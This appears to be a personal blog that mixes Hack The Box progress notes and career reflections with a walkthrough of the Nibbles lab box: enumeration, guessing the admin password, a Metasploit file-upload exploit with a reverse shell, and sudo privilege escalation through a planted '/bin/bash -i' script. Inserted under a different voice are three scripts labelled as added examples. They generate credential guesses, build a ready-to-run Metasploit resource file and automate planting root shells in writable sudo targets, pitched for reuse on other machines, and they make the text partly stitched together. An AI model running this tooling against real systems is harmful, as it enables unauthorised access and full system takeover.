Traverxec on HTB!

Yay!  I got another easy active box.  I am learning a lot about certain services and some privilege escalation.  It’s fun.  I am officially a script kiddie on hack the box.  haha

Well, back to work.

Root. On an active HTB. Woot!

Okay, so through working at the box for the most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pore over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far into the book, but I am already picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal reiterates this in the book by basically throwing shade on people who follow their passion.  Simply put, many of us don’t know our passion, or think we do, only to ask “is this really what I want out of life?”

I go back to work from parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, in the words of Steve Martin, be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then onto VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

Hack The Box :: Nibbles Walk-through

Priv esc threw me for a loop on this one

This is a small win for me. It’s a retired box, so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that, out of all the walk-throughs, none of the privesc steps could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
(scan result: ports 22 and 80 open)

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the page source, I found /nibbleblog/ referenced as a path in the URL.

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where a bit of extra enumeration pays off. If you go back to the blog, you will see a link for the Atom feed, http://10.10.10.75/nibbleblog/feed.php, and its title is “nibbles”. The content/private directory is also readable from the outside: http://10.10.10.75/nibbleblog/content/private/users.xml lists admin as a user. Put the two together (the site name as the password) and you get the following. Guess sparingly, though: Nibbleblog records failed logins in that same users.xml and blacklists your IP after a few, so a spray will just lock you out.

Username: admin
Password: nibbles
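As an added example (my script, not something from the original post), here is that enumeration-to-guess step written down so it is repeatable on the next blog engine that leaks its site name and user list. The values “nibbles” and “admin” are the ones from the box; the two XML documents are constructed stand-ins for what feed.php and users.xml return, and the curl lines at the bottom assume the URL layout shown above.

```shell
#!/bin/bash
# Added example, not code from the original post: turn the two enumeration
# hits (the feed title and the users.xml username) into a short list of
# credential pairs to try by hand. "nibbles" and "admin" come from the post;
# the two XML documents below are constructed stand-ins for what feed.php and
# content/private/users.xml actually return.

SAMPLE_FEED='<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>nibbles</title>
  <entry><title>Yum yum</title></entry>
</feed>'

SAMPLE_USERS='<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
  </user>
</users>'

# The first <title> in an Atom feed is the blog title (entry titles come later).
feed_title() {
    printf '%s\n' "$1" | sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' | head -n 1
}

# Every username="..." attribute in a Nibbleblog users.xml, one per line.
xml_usernames() {
    printf '%s\n' "$1" | sed -n 's/.*<user username="\([^"]*\)".*/\1/p'
}

# Mutate one seed word the way people mutate a site name into a password:
# as-is, capitalised, and each with a few common suffixes (10 candidates).
password_candidates() {
    w="$1"
    cap="$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')$(printf '%s' "$w" | cut -c2-)"
    for base in "$w" "$cap"; do
        for suffix in "" 1 123 2017 "!"; do
            printf '%s%s\n' "$base" "$suffix"
        done
    done
}

# user:password pairs from a feed document and a users.xml document.
# The list is kept this short on purpose: Nibbleblog counts failed logins in
# users.xml and blacklists the client IP after a few, so spraying locks you out.
credential_pairs() {
    seed=$(feed_title "$1")
    xml_usernames "$2" | while IFS= read -r user; do
        password_candidates "$seed" | while IFS= read -r pw; do
            printf '%s:%s\n' "$user" "$pw"
        done
    done
}

# Live use against the box (URLs as found during enumeration):
#   feed=$(curl -s http://10.10.10.75/nibbleblog/feed.php)
#   users=$(curl -s http://10.10.10.75/nibbleblog/content/private/users.xml)
#   credential_pairs "$feed" "$users"
```

The pairs come out with the plain site name first, which is the one that worked here; everything after it is only there in case the next target was slightly less lazy.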

I started looking for exploits at this point. The best fit is an authenticated arbitrary file upload through Nibbleblog’s “My image” plugin (the upload lands under content/private/plugins/my_image, which is exactly where the shell drops you later), and the cleanest version of it is the Metasploit module on Exploit-DB: https://www.exploit-db.com/exploits/38489. It needs the admin credentials from above. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options (RHOSTS, TARGETURI, USERNAME, PASSWORD, and LHOST/LPORT for the reverse payload) and send.
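The option screenshot did not survive, so as an added example (my script, not the post’s) here is the same module configured as a Metasploit resource script, which also makes the run repeatable. The target, path and credentials are the ones from this box; the LHOST/LPORT values are placeholders for your own VPN address and listener, and the php/meterpreter/reverse_tcp payload is my choice.

```shell
#!/bin/bash
# Added example, not code from the original post: the options the walkthrough
# sets by hand, written out as a Metasploit resource script. Target and
# credentials are from the post; LHOST/LPORT are assumed placeholders (your
# VPN address and listener port) and the payload choice is mine.

# Write the resource script for exploit/multi/http/nibbleblog_file_upload.
# Args: target host, attacker host, attacker port, output file.
write_nibbleblog_rc() {
    rhost="$1"; lhost="$2"; lport="$3"; out="$4"
    cat > "$out" <<EOF
use exploit/multi/http/nibbleblog_file_upload
set RHOSTS $rhost
set RPORT 80
set TARGETURI /nibbleblog
set USERNAME admin
set PASSWORD nibbles
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
check
exploit
EOF
}

# Run the script without the interactive console banner.
run_nibbleblog_rc() {
    msfconsole -q -r "$1"
}

# Cheap sanity check before launching: the module talks to admin.php over
# HTTP, so confirm the web port answers at all (bash /dev/tcp connect).
web_port_open() {
    timeout 5 bash -c "exec 3<>/dev/tcp/$1/${2:-80}" 2>/dev/null
}

# Usage: write_nibbleblog_rc 10.10.10.75 10.10.14.5 4444 nibbles.rc
#        web_port_open 10.10.10.75 && run_nibbleblog_rc nibbles.rc
```

The `check` line runs the module’s own check first (the search output above shows it supports one), so a bad TARGETURI or wrong credentials shows up before any payload is uploaded.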

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, privesc. This was the hardest part and took me a while to get down, but this article finally did me good and I was able to work it out. The first thing to figure out is whether there is anything you can run as root. You check that with:

sudo -l

So nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password. That path sits under /home/nibbler, which we own, and the script itself only exists inside personal.zip in the home directory: unzip it to get monitor.sh (or simply create the personal/stuff directory yourself, since sudo only cares about the path). Now make monitor.sh contain the following:

#!/bin/bash
/bin/bash -i

You can do this by appending the two lines to the end of the existing file, by overwriting it with a copy sent over netcat, or by going back to meterpreter and uploading it. Make sure the file is executable (chmod +x monitor.sh).

Then run it through sudo using the exact path from sudo -l (sudo matches the absolute path in the sudoers entry, so ./monitor.sh only works if your current directory is /home/nibbler/personal/stuff):

nibbler@Nibbles:/home/nibbler$ sudo /home/nibbler/personal/stuff/monitor.sh
I am root!
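As an added example (my script, not the original post’s), here is the whole privesc check from the last few paragraphs scripted, which is what I now run first on any box that hands me a sudo -l entry. It parses the sudo -l output, works out whether the current user can write, replace or create each NOPASSWD target (the question that tripped me up, since monitor.sh did not even exist until personal.zip was unzipped), plants the two-line root shell and prints the full-path sudo command. The monitor.sh path is the one from the box; the sudo -l text is a constructed sample in sudo’s normal output format.

```shell
#!/bin/bash
# Added example, not code from the original post: the privesc check done by
# hand above, automated. It parses `sudo -l` output for NOPASSWD commands,
# decides whether the current user can replace or create each target, plants
# the walkthrough's two-line root shell there, and prints the exact sudo
# command to run. The monitor.sh path is from the post; the sudo -l text is a
# constructed sample laid out the way sudo prints it.

SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# Each command runnable as another user without a password, one per line.
nopasswd_commands() {
    printf '%s\n' "$1" \
      | sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' \
      | tr ',' '\n' \
      | sed 's/^[[:space:]]*//; s/[[:space:]]*$//; /^$/d'
}

# How the current user controls PATH: "writable" (exists and we can write it),
# "replaceable:DIR" (exists but read-only, and DIR is ours so we can swap it),
# "creatable:DIR" (missing, but the nearest existing ancestor DIR is writable).
# Returns 1 when none of those apply.
control_over() {
    p="$1"
    if [ -e "$p" ]; then
        if [ -w "$p" ]; then echo writable; return 0; fi
        if [ -w "$(dirname "$p")" ]; then echo "replaceable:$(dirname "$p")"; return 0; fi
        return 1
    fi
    d=$(dirname "$p")
    while [ ! -e "$d" ]; do d=$(dirname "$d"); done
    if [ -d "$d" ] && [ -w "$d" ]; then echo "creatable:$d"; return 0; fi
    return 1
}

# Put the walkthrough's payload at PATH (creating missing parents) and make it
# executable. On Nibbles the parents come from unzipping personal.zip, but
# mkdir -p works just as well because /home/nibbler belongs to us.
plant_root_shell() {
    p="$1"
    mkdir -p "$(dirname "$p")"
    printf '#!/bin/bash\n/bin/bash -i\n' > "$p"
    chmod +x "$p"
}

# For every NOPASSWD command we control, plant the shell and print the command
# to run. sudo matches the absolute path from sudoers, so it is printed in full
# rather than as ./monitor.sh. Non-path entries (e.g. ALL) are reported, not
# planted: ALL means any command, so plain `sudo -i` already does the job.
exploit_sudo_l() {
    nopasswd_commands "$1" | while IFS= read -r cmd; do
        target=${cmd%% *}        # strip any arguments listed after the binary
        case "$target" in
            /*) ;;
            *) printf 'non-path entry %s (ALL? just try sudo -i)\n' "$target" >&2; continue ;;
        esac
        if how=$(control_over "$target"); then
            plant_root_shell "$target"
            printf 'sudo %s   # %s\n' "$target" "$how"
        else
            printf 'no control over %s\n' "$target" >&2
        fi
    done
}

# On the box:  exploit_sudo_l "$(sudo -l)"
```

The “replaceable” case is the one most walk-throughs skip: a root-owned, read-only script in a directory you own can still be renamed away and replaced, because the directory permissions, not the file’s, decide that.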

And there we go. Now to get the flag…

cat /root/root.txt

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!